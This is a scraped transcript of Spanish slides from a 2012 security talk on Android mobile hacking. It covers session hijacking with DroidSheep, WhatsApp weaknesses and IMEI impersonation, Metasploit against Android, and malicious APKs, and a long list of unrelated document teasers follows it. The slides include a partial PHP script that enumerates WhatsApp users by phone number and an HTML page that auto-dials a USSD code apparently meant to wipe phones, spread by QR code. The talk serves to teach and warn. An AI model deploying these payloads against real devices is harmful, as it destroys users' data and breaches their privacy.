|
|
- José Francisco Sánchez Ramos
- hace 8 años
- Vistas:
Transcripción
1
2
3
4 DISCLAIMER Todo el contenido de esta charla es resultado de investigación con fines didácticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentación. La información contenida debe ser utilizada únicamente para fines éticos y con la debida autorización. Todo descubrimiento realizado, ha sido y será usado de forma legal. La audiencia debe asumir todo lo que se exponga hoy, como falso y sin fundamento hasta que lo compruebe personalmente. Limahack no es el autor directo de ninguno de los descubrimientos expuestos, ni de las herramientas demostradas, ni los conoce. Todas las opiniones vertidas durante esta presentación son exclusivas del expositor, Limahack no es responsable de ninguna de las opiniones vertidas.
5
6 aula H4XOR Android mobile hacking: ataques y atacando con el androide Omar Palomino Por qué Android? Ataques a Sistemas Operativos Windows - Linux Ataques a redes LAN desde Android Atacando a sistemas Android
7 Quién soy? Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas Certificado CEHv7, Security+, ITILv3 Consultor en Seguridad de información Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres: omarc320@gmail.com
8 Por qué Android? Participación en el mercado de Sistemas Operativos móviles 5% 17% 4% 4% 2% 0% 68% Android IOS Blackberry Symbian Windows Linux Otros
9 Por qué Android? Otros sistemas operativos ya no tienen participación en el mercado (RIP Blackberry) Los hackers están buscando nuevos objetivos (nuevos retos!!), siempre a la vanguardia.
10 Por qué Android? Se pueden realizar ataques cada vez mas sigilosos (ya no es necesario una laptop para realizar ataques) Es muy común que a través de Android nos. Conectamos a redes wireless libres Accedamos a correo electrónico Accedamos a redes sociales Realicemos transacciones financieras
11 La agenda de hoy: Atacando S.O Windows Forense de tráfico generado x Android Ataques de red LAN Android vs Metasploit
12 Requisitos: Tener el Android rooteado (super privilegios). Todas las herramientas interesantes requieren de super-privilegios. Analizar la mejor situación para realizar un ataque. Utiliza tu Android es un gran amigo.
13 Atacando Windows Tool: Anti (Android Network Toolkit) Con Anti podemos: Buscar vulnerabilidades Auditoría de passwords Ataques de man in the middle Ejecutar comandos en el SO Descubrir tráfico inseguro en la red
14 Atacando Windows
15 Atacando Windows USO DE NMAP SCANEO DE PUERTOS DETECCIÓN DE SIST. OPERATIVO SCRIPT DE VERIFICACIÓN DE VULNERABILIDADES
16 Atacando Windows
17 Atacando una red LAN Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook, Hotmail, Twitter) El código fuente es libre: Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear. WTF!!!! La comunidad XDA-developers sigue sacando nuevas versiones del software. (
18 Atacando una red LAN Funcionamiento: Session Hijacking 1 El usuario ha ingresado normalmente a una aplicación web comercial o corporativo, como: Hotmail Facebook Twitter 2 DROIDSHEEP capturas las cookies asociadas a la sesión creada y las utiliza. No es necesario capturar la contraseña.
19 Atacando una red LAN Funcionamiento: Session Hijacking Droidsheep reconoce las cookies de aplicaciones como Facebook y Hotmail, además te puedes enviar las cookies por correo electrónico.
20 Atacando una red LAN
21 Análisis de Tráfico Android Cada vez utilizamos nuestros celulares para conectarnos a Internet. La mayoría de las personas se conecta a redes wireless abiertas. Como TÚ!!! Muchas aplicaciones no encriptan la información que envían, las envían en texto plano.
22 Por qué es interesante analizar el tráfico de red.?
23 Por qué es interesante analizar el tráfico de red.?
24 Análisis de tráfico - Whatsapp Whatsapp se ha convertido en un mecanismo para el envío de mensajes muy popular. Es muy parecido a los SMS pero gratuito (hasta el momento). Tiene serios problemas para dar seguridad a la información que envía hacia internet porque enviaba todo en texto claro. Ahora envía la información con un HASH MD5
25 Pero es sólo un simple MD5 Whatsapp tiene serios problemas de seguridad, analicemos: Cada vez que Whatsapp inicia debe verificar si tus contactos cuentan con una cuenta activada. Para eso se conecta a una URL y consulta el estado de tus contactos, por ejemplo: <A>:Código de país del número a consultar <B>: Número a consultar <C>: Cualquier número de WhatsApp (o el mismo número)
26 Pero es sólo un simple MD5 Número del teléfono consultado Estado y mensaje del Whatsapp Número del teléfono consultado
27 Cuánta gente tiene Whatsapp en el Perú? El ministerio de transportes y comunicaciones nos dará una manito:
28 <?php mysql_connect("localhost","root", password"); mysql_select_db("limahakc2012"); for($i= ; $i<= ;$i++){ Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR $whatsapp =" $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,curlopt_useragent,'whatsapp/2.6.7 iphone_os/5.0.1 Device/Unknown_(iPhone4,1)'); curl_setopt($ch, CURLOPT_URL, $whatsapp); $cuerpo = curl_exec($ch); curl_close($ch); &u[]= if (preg_match('/<key>/',$cuerpo)) { $explodeo_datos = explode('<dict>',$cuerpo); $explodeo_estado = explode('<key>s</key>',$explodeo_datos[1]); $explodeo_estado = explode('<key>jid</key>',$explodeo_estado[1]); }}?> $query1 ="insert into WhatsApp_users3 (numero,mensaje,status) values ('".$i."','".$$explodeo_estado[0]."',1) "; mysql_query($query1);
29 EL ATAQUE:
30 Cómo envía Whatsapp los mensajes? WhatsApp tiene un mecanismo de autenticación basado en SASL DIGEST MD5. Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password, pero obviamente el password no se envía ya que sirve para generar el CHALLENGE (MD5) PASSWORD? Pero si nunca pusimos un password. El password es: Android: IME (International Mobile Equipment Identity) Iphone y otros: la MAC
31 WhatsApp - API API no oficial de WhatsApp Está bajo licencia MIT refer to the source code for the extra line INGENIERIA REVERSA
32 El ataque: obteniendo el IMEI Si obtenemos el IMEI podemos suplantar una identidad de alguien y ademas recibir sus mensajes. OJO: Si te haces pasar por esa persona y recibes los mensajes, la verdadera persona no los recibirá. Moraleja: El celular es como el calzoncillo.. No se presta a nadie a nadie!!!
33 EL ATAQUE:
34 Atacando Android
35 Atacando Android Utilizaremos el Android Virtual Device para hacer nuestras pruebas. El objetivo es obtener información sensible de los teléfonos celulares. Lo más importante es tener actualizado siempre el celular. A veces, no basta con tenerlo actualizado porque sólo se sacan actualizaciones para los últimos modelos.
36 Atacando Android Utilizaremos un módulo auxiliar de Metasploit para realizar el ataque.
37 Atacando Android
38 EL ATAQUE:
39 Códigos USSD El USSD (acrónimo de Unstructured Supplementary Service Data, Servicio Suplementario de Datos no Estructurados en inglés) es un servicio para el envío de datos a través de móviles GSM, al igual que el SMS. Es usado normalmente para comunicación con el proveedor de telefonía, generalmente para servicios de mensajería en tiempo real. Aquí algunos códigos USSD: *#06# *150# *2767*3855# (no deberías ejecutar este)
40 Códigos USSD Así como existe los links para enviar correo: <a Enviar </a> También existe el mail para LLAMAR : <a href="tel: ">llamar LIMAHACK</a> Algunos códigos USSD no necesitan la intervención de marcado para ser ejecutados, simplemente se ejecutan, pueden probar esto: *#06# Entonces que pasa si
41 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:
42 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:
43 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:
44 EL ATAQUE: <html> <head> <title>fiesta LimaHack 2012</title> <meta http-equiv="refresh" content="0;url=tel *2797*3855%23 "> </head></body> </html>
45 Aplicaciones APK Maliciosas > Se han heredado todas las malas costumbres del mundo Windoneano, todos instamos dando NEXT, NEXT, NEXT > Sabemos lo que realmente estamos instalando en nuestro celular?
46 Google Play y la política.. Información personal y confidencial: no se permite la divulgación o la publicación no autorizada de información de carácter privado o confidencial de los usuarios (como números de tarjetas de crédito, de la Seguridad Social, del permiso de conducir o de otros documentos ) ni de cualquier otra información que no sea de acceso público. El problema es que NADIE lo verifica.
47 Instalaremos una aplicación mo.reservations
48 Google Play y la política.. Antes de instalar el APK: Después de instalar: Créditos: billy.grados@gmail.com Developer de aplicaciones para Android
49 Google Play y la política..
50 Google Play y la política..
51 Google Play y la política..
52 EL ATAQUE:
53 Conclusiones Android es una herramienta muy potente para realizar pruebas básicas de penetración de sistemas, a nivel de sistema operativo y redes LAN. WhatsApp presenta debilidades de seguridad de información importantes. El celular nunca se presta!!!! Nunca!! Existen diversas vulnerabilidades en sistemas Android : Códigos USSD y a través de Metasploit para versiones antiguas de Android. Google Play tiene una política de seguridad de información, sin embargo, no verifica que las aplicaciones cumplan con dicha política. Actualiza tu Android, verifica los permisos otorgados a cada aplicación y no instales APK files de dudosa procedencia.
54
55
1. Qué es Escudo Movistar para móviles?
1. Qué es Escudo Movistar para móviles? Es una solución de seguridad para teléfonos móviles inteligentes (Smartphones) la cual presenta una gran variedad de funcionalidades dependiendo del paquete contratado,
Más detallesCapítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable
Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)
Más detallesSession Hijacking: Secuestro de sesiones en aplicaciones web empresariales
Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com
Más detallesPreguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información
Guía de Cifrado Preguntas y respuestas sobre el cifrado de la información personal La guía para aprender a cifrar tu información 2 Qué es lo que estamos cuidando? A través del cifrado cuidamos de fotos,
Más detallesEscudo Movistar Guía Rápida de Instalación Dispositivos Symbian
Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3
Más detallesLa única plataforma de autenticación que necesita.
La única plataforma de autenticación que necesita. Autenticación Fuerte o doble Factor? Es su elección. Nuestro enfoque tiene que ver con lograr el equilibrio correcto de la seguridad, costo y facilidad
Más detallesRecomendaciones de Seguridad Red Social Twitter
Recomendaciones de Seguridad Red Social Twitter Medidas de seguridad para Twitter Tras varios ataques a cuentas de reconocidas empresas, Twitter anunció nuevas medidas de seguridad. Cualquier usuario que
Más detallesManual aplicación móvil iphone y Android
Manual aplicación móvil iphone y Android Índice Para qué sirve la aplicación? 1 Sirve para mi teléfono? 1 Dónde la puedo descargar? 2 Registrarse en la aplicación 3 Pantalla de Inicio 5 El Club 6 Reservar
Más detallesMÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD
MÓDULO 2: LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD TEMA 1 INVOICE BUBBLE Web oficial: http://invoicebubble.com Soporte/s en los que funciona: Es una aplicación web. Funcionalidades: o Crear
Más detallesOBJETIVOS DE LA CAPACITACION
OBJETIVOS DE LA CAPACITACION Cuando empiezan a funcionar tus correos. Utilizar tu correo por Web. Cambiar la contraseña de tu correo. Configurar Redireccionamientos. Crear Auto Contestadores. Configuración
Más detallesMÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD
MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD En este tema, os vamos a dar a conocer una serie de aplicaciones o programas que os pueden ser de mucha utilidad, en función a las necesidades
Más detallesCapítulo 1. Introducción
Capítulo 1. Introducción Nombre del Tema Aspectos de seguridad en aplicaciones basadas en WIFI. Asesor: Dr. Oleg Starostenko Basarab Actualidad y Definición del problema Desde hace ya tiempo nos hemos
Más detallesNovedades PhotoGestion 5
Novedades PhotoGestion 5 En este documento repasamos las novedades más importantes de la versión 5 del programa PhotoGestion. Explicaremos cada novedad, como funciona y como se configura. Contenido Envío
Más detallesCurso de PHP con MySQL Gratis
Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este
Más detallesGUÍA RED SOCIAL LINKEDIN
GUÍA RED SOCIAL LINKEDIN Cómo sacarle el máximo partido a Linkedin para crecer profesionalmente Linkedin, es una de las redes profesionales más potentes del mundo Qué es una Linkedin Linkedin, es una de
Más detallesSMS para empresas de software
SMS para empresas de software Automatiza el envío de SMS fácilmente Cada vez hay más empresas que utilizan SMS, tanto si tu empresa vende software como páginas web o aplicaciones. Te recomendamos que les
Más detallesEmpresas. Guía de uso. App Mi Movistar Empresas
Empresas Guía de uso App Mi Movistar Empresas Índice 1. Ventajas del nuevo Mi Movistar 3 2. Tipos de usuarios de Mi Movistar 4 3. Cómo acceder a Mi Movistar 5 4. Acceso Aplicación 6-9 5. Navegación y opciones
Más detallesBarómetro Splio sobre aperturas email marketing en móvil 1r semestre 2012 Splio
Splio es una empresa de marketing directo, especializada en email marketing, sms marketing y CRM social. Desde su creación en París en 2001, Splio solamente trabaja con empresas que están comprometidas
Más detallesAnalítica para tu Tienda Online
Analítica para tu Tienda Online Mide, analiza y actúa para mejorar tus resultados Índice 1. Qué es la analítica 2. Configura tu Tienda Online para utilizar tu herramienta de analítica 3. Métricas más habituales
Más detallesTu número y tu línea desde sólo 1,95 /mes
información Sin línea de teléfono. Sólo necesitas internet Tu número y tu línea desde sólo,95 /mes Tendrás tu línea IP (cuenta SIP) y un número de la provincia que elijas por tan solo,95 / mes. Si quieres
Más detallesSMS FACEBOOK CHAT. Guía de usuario
SMS FACEBOOK CHAT Guía de usuario SMS Facebook CHAT Qué es SMS Facebook CHAT? Es el servicio que te permite estar online en el chat de Facebook sin necesidad de tener un plan de datos. Solo necesitas tener
Más detallesPOLÍTICA DE PRIVACIDAD PARA APLICACIONES MÓVILES GRUPOCOPESA. 1. información que se obtiene la aplicación y su utilización
POLÍTICA DE PRIVACIDAD PARA APLICACIONES MÓVILES GRUPOCOPESA Nuestra política de privacidad se aplica al uso de las aplicaciones informáticas de los siguientes medios de comunicación: LaTercera, LaCuarta,
Más detallesRETO HACKER DE VERANO
RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque
Más detallesDiseño de aplicaciones móviles seguras en Android. alvaro.ospina@upb.edu.co aospina@gmail.com
Diseño de aplicaciones móviles seguras en Android alvaro.ospina@upb.edu.co aospina@gmail.com Agenda Que es Android? Historia? Arquitectura Herramientas Medidas de seguridad Que es Android? Pila de software
Más detallesRETO FORENSE EPISODIO III Resumen Ejecutivo
RETO FORENSE EPISODIO III Resumen Ejecutivo José Antonio Valero Sánchez javalero@gmail.com Zaragoza, España 2006 Motivos de la intrusión. Después de analizar la imagen del sistema cabe destacar que el
Más detallesAsistente RACC Móvil
Smartphones Asistente RACC Móvil Para configurar Internet/servicios y resolver las posibles incidencias con tu smartphone Android. Válido para las diferentes versiones del sistema operativo Android Esta
Más detallesMovilizando la intranet de la Facultad de Informática
Movilizando la intranet de la Facultad de Informática 1 de noviembre de 2011 Jaume Moral, Hugo Hernández Marcel Arbó y Roger Sala http://www.fib.upc.edu/ La intranet: El Racó Es la Intranet de la Facultad
Más detallesSoluciones para Lotería Móvil. www.structura.ec
Soluciones para Lotería Móvil 1 Lotería a través de celulares: Introducción STRUCTURA CAPITAL LATIN AMERICA S.A. es una compañía especializada en licencias de propiedad intelectual, que provee soluciones
Más detallesSeguridad en la banca electrónica. <Nombre> <Institución> <e-mail>
Seguridad en la banca electrónica Contenido Banca electrónica Principales riesgos Cuidados a tener en cuenta Fuentes Banca electrónica (1/4) Permite: realizar las mismas
Más detallesGuía de doble autenticación
Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.
Más detallesUNIDAD CENTRAL DEL VALLE DEL CAUCA
UNIDAD CENTRAL DEL VALLE DEL CAUCA Implementación de la aplicación SIGA Instructivo para el manejo de la oficina virtual de los estudiantes Versión 2.0 Historial de Revisiones Fecha Versión Descripción
Más detallesTIC s EL CORREO ELECTRÓNICO
TIC s EL CORREO ELECTRÓNICO 2 Qué es un correo electrónico? El correo electrónico también te sirve para vender tus productos o servicios. Trata de usar siempre la misma dirección, tus clientes pueden confundirse
Más detallesCABLE & WIRELESS PANAMA PREGUNTAS FRECUENTES PLAN DATA MÓVIL MAIL
1. Qué es el servicio de móvil Mail? CABLE & WIRELESS PANAMA PREGUNTAS FRECUENTES PLAN DATA MÓVIL MAIL Móvil mail permite a nuestros clientes de +móvil prepago y contrato configurar, enviar y recibir su
Más detallesConfigurar protección infantil en Windows XP
Configurar protección infantil en Windows XP Web de la asociación española de pediatría En la web de la asociación española de pediatría podemos encontrar un link al site que han montado junto a Microsoft
Más detallesUn sistema adecuadamente refrigerado debe mantener una temperatura de 90 110 grados.
Informáticas I 2. Protección de información y Hardware Debemos tomar medidas cuando usar computadoras no sólo para mantener nuestros archivos e identidad fuerte y segura, sino también nuestros equipos.
Más detallesUsted debe ser cliente y mantener un producto activo con el banco. 6. Qué tipo de transacciones puedo realizar en la Banca en Línea?
Preguntas frecuentes Banca en Línea 1. Quiénes pueden tener acceso a Banca en Línea? Toda persona natural o jurídica que cuente con un producto activo en el Banco Nacional de Panamá. 2. Cómo debo afiliarme
Más detallesComo crear una app gratis para tu negocio con Appmakr
Como crear una app gratis para tu negocio con 1 ÍNDICE 1 Introducción 3 2 Conceptos básicos de una App 4 Repositorios de Aplicaciones de Software libre 1 Introducción 3 INTRODUCCIÓN Introducción al concepto
Más detallesCómo rastrear, espiar y localizar un Celular
Cómo rastrear, espiar y localizar un Celular Preguntas Frecuentes Vista Previa del Area de Miembros Como adquirir el Programa www.comorastrearuncelular.com NOTA: Usted puede compartir esta publicacion
Más detallesdocumento de retenciones e información de pagos
retenciones. documento de retenciones e información de pagos diverza.com web. página 2 retenciones. documentos electrónicos de retenciones e información de pagos. servicio web introducción. Bienvenido
Más detallesTransport Layer Security (TLS) Acerca de TLS
Transport Layer Security (TLS) Acerca de TLS Contenido Correo electrónico seguro en HSBC... 2 Acerca de Transport Layer Security..... 2 Para establecer una conexión Forced TLS con HSBC... 4 Glosario...
Más detallesREPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS
REPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS DIRECCIÓN DE INFORMÁTICA Y SISTEMAS DIVISIÓN DE FORMACIÓN
Más detallesUbuntu Server 12.10 HOW TO : SERVIDOR VPN. EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como usar vpn. Qué es una VPN?
Ubuntu Server 12.10 HOW TO : SERVIDOR VPN EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como usar vpn. Qué es una VPN? Una red privada virtual o VPN (Virtual Private Network), es una
Más detalles#Hacking dispositivos ios
#Hacking dispositivos ios [iphone/ipod Touch/ ipad] Autor: Japson Índice Disclaimer...3 Introducción...3 Cambiando el password por defecto.3 Crackeando el password de OpenSSH. 4 Escenario..4 Detección
Más detallesGUIA DEL PRODUCTO (Vendedor) CAP-PRODUCTO 1
GUIA DEL PRODUCTO (Vendedor) CAP-PRODUCTO 1 DESCRIPCIÓN DEL PRODUCTO Prepago fullmóvil fullmóvil va a ofrecerle a sus clientes una línea celular prepago que funciona en cualquier teléfono Qué es Prepago
Más detallesVÍDEO intypedia003es LECCIÓN 3: SISTEMAS DE CIFRA CON CLAVE PÚBLICA. AUTOR: Gonzalo Álvarez Marañón
VÍDEO intypedia003es LECCIÓN 3: SISTEMAS DE CIFRA CON CLAVE PÚBLICA AUTOR: Gonzalo Álvarez Marañón Consejo Superior de Investigaciones Científicas, Madrid, España Hola, bienvenidos a intypedia. Conocidos
Más detallesPolítica de Privacidad LEVEL UP! GAMES
Política de Privacidad LEVEL UP! GAMES Level Up! Interactive S.A.S se compromete a proteger la privacidad de la información de los visitantes de nuestros entornos virtuales en línea. Esta política se aplica
Más detallesUna solución a la medida de tus necesidades
Una solución a la medida de tus necesidades Qué es SISCOBER? Debido a la necesidad actual del mercado y dada la importancia de la tecnología para la gestión de cobranza, SECOBER S.A. DE C.V., pone a su
Más detallesUNIDAD CENTRAL DEL VALLE DEL CAUCA
UNIDAD CENTRAL DEL VALLE DEL CAUCA Implementación de la aplicación SIGA Instructivo para el manejo de la oficina virtual de los estudiantes Versión 3.0 Historial de Revisiones Fecha Versión Descripción
Más detallesCOMO OBTENER SU MASTERCARD SECURE CODE MasterCard Secure Code
MasterCard Secure Code MasterCard SecureCode es el Código de Seguridad que protege contra el uso no autorizado de la tarjeta cuando se realicen compras en internet. Pasos: 1. Ingrese a una tienda virtual.
Más detallesDetectar y solucionar infecciones en un sitio web
Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales
Más detallesRecuperación tecnología. Institución Educativa Juan María Céspedes. Once uno. Daniela Giraldo Mazo Andrea Valencia Monsalve.
Recuperación tecnología Institución Educativa Juan María Céspedes Once uno Daniela Giraldo Mazo Andrea Valencia Monsalve Junio 2015 Alejandro Galvis Ingeniero de Telecomunicaciones Tabla de contenido 1.
Más detallesAPLICACIONES PARA EMPRENDEDORES
APLICACIONES PARA EMPRENDEDORES Sumario 1. INTRODUCCIÓN 2. APLICACIONES Astana Calculador freelance Evernote Hootsuite Lukkom Remember the milk Simple Mind Stratpad Team viewer Thumb Fecha actualización:
Más detallesManual de Ayuda. Banamex Móvil
Banamex Móvil Página 1 Contenido» Mis productos» Solicitud Banamex Móvil» Confirmación de Banamex Móvil» Respuesta de Banamex Móvil» Operación rechazada 2 4 10 12 13 Página 2 Mis productos Qué encuentro
Más detallesAnalítica para tu web
Analítica para tu web Mide, analiza y actúa para mejorar tus resultados Índice 1. Qué es la analítica web 2. Configura webmaker para utilizar tu herramienta de analítica web favorita 3. Métricas más habituales
Más detallesGuía básica para subir vídeos a Youtube
Guía básica para subir vídeos a Youtube Índice Videos en YouTube Paso 1: Crear una cuenta Paso 2: Diseñar tu canal Paso 3: Grabar y editar tu video Paso 4: Subir video Paso 5: Características del video
Más detallesTeniendo en cuenta la importancia del material es responsabilidad de los estudiantes y padres el manejo correcto de las guías y del dispositivo.
Este manual de usuario BOOKSAM del Colegio Santa Angela Merici, es una guía práctica para realizar la descarga e instalación correcta del material de estudio, dando a conocer paso a paso el funcionamiento,
Más detallesDropbox - Inicio rápido
Dropbox - Inicio rápido Qué es Dropbox? Dropbox es un software que enlaza a todas tus computadoras mediante de una sola carpeta. Es la manera más fácil de respaldar y sincronizar archivos entre computadoras.
Más detallesSeguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos.
Seguridad en Administración de Redes INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Administración de Seguridad en Redes La administración
Más detallesRESOLUCIÓN DE INCIDENCIAS PROCURADORES
RESOLUCIÓN DE INCIDENCIAS PROCURADORES Información para el CAU: Acceso al aplicativo: Una incidencia que se ha dado mucho es que les salía la siguiente pantalla de error al acceder al aplicativo: Esta
Más detallesWEB APP VS APP NATIVA
WEB APP VS APP NATIVA Agosto 2013 Por Jesús Demetrio Velázquez 1 Ya decidió hacer su aplicación en Web App o App Nativa? Debido a que surgieron varias preguntas relacionadas con nuestro artículo Yo Mobile,
Más detallesTPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR
TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR El TPV (Terminal Punto de Venta) Virtual es un producto dirigido a empresas y comercios, con tienda en internet, que permite el cobro de las ventas realizadas
Más detallesFácil manipulación ya que no la recibirás físicamente evitando que se extravíe o deteriore.
FACTURA ELECTRÓNICA ASPECTOS GENERALES La validez de una factura electrónica es exactamente la misma que una factura en papel y gracias a la certificación efectuada por el SRI se garantiza su integridad
Más detallesplan de marketing online 2015 No está permitida la reproducción íntegra o parcial de este documento sin el consentimiento explícito de Milsi.
plan de marketing online 2015 Última edición: Persona responsable: introducción En Milsi.com creemos en la importancia de un buen plan de Marketing, hoy por hoy no basta con un buen diseño web. Somos expertos
Más detallesTu centralita desde sólo 14 /mes
información Sin línea de teléfono. Sólo necesitas internet Tu centralita desde sólo 14 /mes Tendrás extensiones (cuentas SIP), cuatro canales de voz, el servicio de centralita y un número de la provincia
Más detallesDepartamento CERES Área de Tarjetas Inteligentes Manual de Usuario
14 CORREO SEGURO. Hay aplicaciones de correo que permiten enviar y recibir correos cifrados y firmados digitalmente utilizando criptografía. Estas operaciones garantizan el intercambio seguro de información,
Más detallesManual de iniciación a
DOCUMENTACIÓN Picasa y otras nubes Manual de iniciación a DROPBOX 1 Últimamente se ha hablado mucho de la nube y de cómo es el futuro de la Web. También se han presentado servicios y aplicaciones que ya
Más detallesHemos creado una cuenta para el AlmeríaChapter en Dropbox (servicio gratuito) que nos permite compartir fotos, videos,... desde cualquier lugar.
Hemos creado una cuenta para el AlmeríaChapter en Dropbox (servicio gratuito) que nos permite compartir fotos, videos,... desde cualquier lugar. Los pasos para poder hacerlo son muy sencillos. Si ya tienes
Más detallesAtaques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesServicio de Email Marketing
Servicio de Email Marketing Cuando hablamos de Email marketing, es un envío Masivo de correos con permisos realizado por herramientas tecnológicas de correo electrónico, mediante el cual su anuncio estará
Más detallesHerramientas útiles para gestionar tu negocio
Herramientas útiles para gestionar tu negocio GESTIONA TUS RESERVAS: GOOGLE CALENDAR MARKETING PARA DISPOSITIVOS MÓVILES: MENSATEK Y MASSYPHONE MARKETING PARA CORREO PUBLICITARIO Y PROMOCIONAL: MAILCHIMP
Más detallesACCIONES FORMATIVAS. oct/nov 2013. coordinación docente
oct/nov coordinación docente calendario octubre/noviembre L M X J V S D 1 2 3 4 5 6 WORDPRESS INTEGRAL WORDPRESS INTEGRAL GOOGLE ANALYTICS Y HERRAMIENTAS GOOGLE 7 8 GOOGLE ANALYTICS Y HERRAMIENTAS GOOGLE
Más detallesSecurity Health Check
www.pwc.es Security Health Check Aportamos el valor que necesitas Un problema no tan lejano... Durante los últimos años, las empresas han abordado procesos de transformación tecnológica sin precedentes
Más detallesHealth Republic Insurance Política de privacidad del sitio web
Health Republic Insurance Política de privacidad del sitio web Introducción Nos encargamos seriamente de salvaguardar su privacidad. Hemos creado esta Política de privacidad del sitio web para familiarizarnos
Más detallesUniversidad Técnica Federico Santa María Departamento de Electrónica. Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad
Universidad Técnica Federico Santa María Departamento de Electrónica Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad Integrantes: Edson Contreras C. Luis Marcel Barraza M. Fecha:
Más detallesENVÍO DE E-MAIL POR MEDIO DE SMTP
UNIVERSIDAD TÉCNICA FEDERICO SANTA MARÍA DEPARTAMENTO DE ELECTRÓNICA ELO 322: REDES DE COMPUTADORES I ENVÍO DE E-MAIL POR MEDIO DE SMTP Alumnos Ariel Mancilla G. 2521040-9 Daniel Spataris J. 2521029-8
Más detallesManual de Usuario e Instalación McAfee Multi Access
Manual de Usuario e Instalación McAfee Multi Access Bienvenido a McAfee Multi Access! McAfee Multi Access es un servicio de seguridad que proporciona una protección completa hasta en cinco dispositivos
Más detallesSeguridad en Internet: la visión de los usuarios.
Marzo 2009 Seguridad en Internet: la visión de los usuarios. Investigación de mercado especialmente realizada por D Alessio IROL para CertiSur S.A. Se autoriza la utilización total o parcial de este material
Más detallesSolución al Primer Reto
En el reto que se planteaba en el primer articulo se pedía conseguir toda la información posible sobre la maquina virtual que se suministra y a través de dicha información descubrir vulnerabilidades e
Más detallesPor: Lic. Luis Coreas Gerente General & Social Media Cmarketing. 1 http://es.wikipedia.org/wiki/c%c3%b3digo_qr
Herramientas tecnológicas para el Posicionamiento de una marca. Por: Lic. Luis Coreas Gerente General & Social Media Cmarketing Existen diferentes herramientas tecnológicas que no se les están dando la
Más detallesEthical Hacking and Countermeasures
Page 1 Ethical Hacking and Countermeasures http://www.eccouncil.org Página 2 EHTM CCertified Ethical Hacker Contenido Qué hay de nuevo en CEHv6?... Pág. 4 Certified Ethical Hacker v6...... Pág. 5 Programa
Más detallesEmpieza a utilizar LiveBox
2014 Empieza a utilizar LiveBox http://www.liveboxcloud.com Empieza a utilizar Livebox Livebox es un software de cloud privado que te permite almacenar, compartir y editar documentos ubicados dentro del
Más detallesMDM Cloud. Conociendo el servicio. Alestra Información Restringida.
MDM Cloud Conociendo el servicio Alestra Información Restringida. MDM Cloud es un servicio desarrollado en conjunto con SAP y su producto Afaria, que ofrece una herramienta para gestión dispositivos móviles
Más detallesCómo sabes si tus esfuerzos en Social Media te están dando resultados? Para eso hay que medir, y Google Analytics ha venido a ayudarnos.
Cómo sabes si tus esfuerzos en Social Media te están dando resultados? Para eso hay que medir, y Google Analytics ha venido a ayudarnos. Hoy en día, las piedras angulares de los negocios son las páginas
Más detallescorreo electrónico con hotmail
correo electrónico con hotmail Aunque parezca mentira, a pesar de ser la utilidad más antigua, extendida y útil de la Internet, no todo el mundo sabe como enviar un correo electrónico. En muchos casos,
Más detallesFAQ Santander Twist JUNIO 2014
